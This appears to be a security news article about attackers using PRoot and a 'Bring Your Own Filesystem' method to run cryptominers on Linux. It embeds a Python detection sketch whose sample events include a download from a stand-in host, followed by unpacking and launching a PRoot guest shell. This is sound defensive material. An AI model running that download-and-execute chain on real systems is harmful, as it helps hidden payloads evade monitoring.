Hackers use the PRoot open-source tool to target Linux

December 21, 2022
Tags: Hackers, PRoot, Open Source, Linux

Threat actors are currently abusing the PRoot open-source tool to target Linux-based devices. Because PRoot works across multiple Linux distributions, it gives adversaries a consistent toolset for attacking any device that Linux supports.

The PRoot toolkit is a user-space implementation of a set of system commands. It is statically compiled and requires no dependencies. The tool can also deliver malicious code by packing it, together with the required executables and packages, into a filesystem.

Threat actors could follow different attack paths to install and operate cryptominers, establish persistence mechanisms, or run additional malware. The tool is also easy to use and removes the attacker's usual concerns about environment setup, executable compatibility, and miner execution.

The threat actor has also employed a new strategy that complements the PRoot open-source tool.

Based on reports, the threat actors use a new method called ‘Bring Your Own Filesystem’ (BYOF) alongside the PRoot open-source tool to run sophisticated attacks.

In this strategy, miscreants build a hostile filesystem on their own system containing all the dependencies, tools, malware, and other necessary artefacts. This filesystem is then packed into a gzip-compressed tar file.

The package is then hosted either on well-known storage platforms or on the attacker's own device. Threat actors could also place it on any other legitimate website that is commonly reachable from a target's internal network.

Once the adversaries gain access to a targeted system, they download the malicious filesystem package together with PRoot. Next, they unpack the filesystem into a folder and run the PRoot executable against that folder.

The infected system then runs commands from the threat actor's filesystem instead of the default one. This control lets the attackers run payloads with less concern about being detected.
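The sequence described above (unpack an archive into a folder, then point PRoot at that folder) is what a defender can look for in process-execution telemetry. The following detection sketch is an added example and is not code from the article or from the PRoot project; the event records are constructed sample data, the `-r`, `-S` and `--rootfs=` option spellings are taken from PRoot's own help text and should be verified against the installed version, and the list of scratch directories is an assumption about where such filesystems tend to be dropped.

```python
"""Detection sketch for the Bring-Your-Own-Filesystem (BYOF) pattern.

Two signals are correlated per login session:
  1. an archive extracted into some directory (tar -x ... -C DIR), and
  2. a later PRoot invocation whose guest root is that same directory.
PRoot rooted under a world-writable scratch directory is reported on its
own at lower severity, since the unpack may have happened out of view.
"""
import os
import shlex
from collections import defaultdict

# Assumed: typical drop locations; tune for your environment.
SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")

# Constructed sample events (not real telemetry): session s1 shows the BYOF
# chain, s2 is a normal source-tree build, s3 a PRoot run from /dev/shm,
# s4 a benign PRoot use by a developer in their home directory.
SAMPLE_EVENTS = [
    {"ts": 1, "session": "s1", "cwd": "/tmp", "cmd": "curl -sO https://example.invalid/rootfs.tar.gz"},
    {"ts": 2, "session": "s1", "cwd": "/tmp", "cmd": "mkdir /tmp/.fs"},
    {"ts": 3, "session": "s1", "cwd": "/tmp", "cmd": "tar -xzf rootfs.tar.gz -C /tmp/.fs"},
    {"ts": 4, "session": "s1", "cwd": "/tmp", "cmd": "./proot -r /tmp/.fs /bin/sh -c run.sh"},
    {"ts": 5, "session": "s2", "cwd": "/home/dev", "cmd": "tar -xzf project.tar.gz -C /home/dev/src"},
    {"ts": 6, "session": "s2", "cwd": "/home/dev", "cmd": "make -C /home/dev/src"},
    {"ts": 7, "session": "s3", "cwd": "/", "cmd": "proot -S /dev/shm/.x /bin/sh"},
    {"ts": 8, "session": "s4", "cwd": "/home/dev", "cmd": "proot -r /home/dev/rootfs-debian /bin/bash"},
]


def tar_extract_dir(argv, cwd):
    """If argv is a tar extraction, return the absolute directory it unpacks into, else None."""
    if len(argv) < 2 or os.path.basename(argv[0]) != "tar":
        return None
    first = argv[1]
    if first.startswith("--"):
        extracting = "--extract" in argv or "-x" in argv
    else:
        # Handles both "-xzf" and old-style "xzf" option clusters.
        extracting = "x" in first.lstrip("-")
    if not extracting:
        return None
    target = cwd
    for i, arg in enumerate(argv):
        if arg == "-C" and i + 1 < len(argv):
            target = argv[i + 1]
        elif arg.startswith("--directory="):
            target = arg.split("=", 1)[1]
    return os.path.normpath(os.path.join(cwd, target))


def proot_rootfs(argv, cwd):
    """If argv runs PRoot, return the absolute guest root it is pointed at, else None."""
    if not argv or os.path.basename(argv[0]) != "proot":
        return None
    root = "/"
    for i, arg in enumerate(argv):
        # Assumed flag spellings from proot's help: -r/--rootfs=, and -S (alias of -r plus binds).
        if arg in ("-r", "-S") and i + 1 < len(argv):
            root = argv[i + 1]
        elif arg.startswith("--rootfs="):
            root = arg.split("=", 1)[1]
    return os.path.normpath(os.path.join(cwd, root))


def _under_scratch(path):
    return any(path == d or path.startswith(d + "/") for d in SCRATCH_DIRS)


def detect_byof(events):
    """Return (ts, severity, message) alerts for the BYOF pattern over a list of events."""
    unpacked = defaultdict(set)  # session -> directories that received an extraction
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        argv = shlex.split(ev["cmd"])
        sess, cwd = ev["session"], ev["cwd"]
        extracted_to = tar_extract_dir(argv, cwd)
        if extracted_to:
            unpacked[sess].add(extracted_to)
            continue
        root = proot_rootfs(argv, cwd)
        if root is None or root == "/":
            continue
        if root in unpacked[sess]:
            alerts.append((ev["ts"], "high", f"proot rooted at {root}, unpacked earlier in session {sess}"))
        elif _under_scratch(root):
            alerts.append((ev["ts"], "medium", f"proot rooted under scratch directory {root}"))
    return alerts


if __name__ == "__main__":
    for ts, sev, msg in detect_byof(SAMPLE_EVENTS):
        print(f"[{sev}] ts={ts}: {msg}")
```

On the constructed sample the high-severity alert fires for session s1 only, the scratch-directory rule catches s3, and the developer's PRoot use in s4 stays silent, which is the distinction a rule like this has to preserve to be usable. In practice the `cmd` and `cwd` fields would come from auditd `EXECVE`/`CWD` records or an EDR process-creation feed rather than the inline list.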

Cybersecurity experts are observing an upward trend of threat actors abusing open-source tools for malicious activities. The attackers have now leveraged PRoot by downloading the precompiled binary from GitLab and running it in BYOF campaigns.

The PRoot open-source tool will surely draw the attention of more threat groups soon, but cryptominers remain the most common payload deployed in these campaigns.
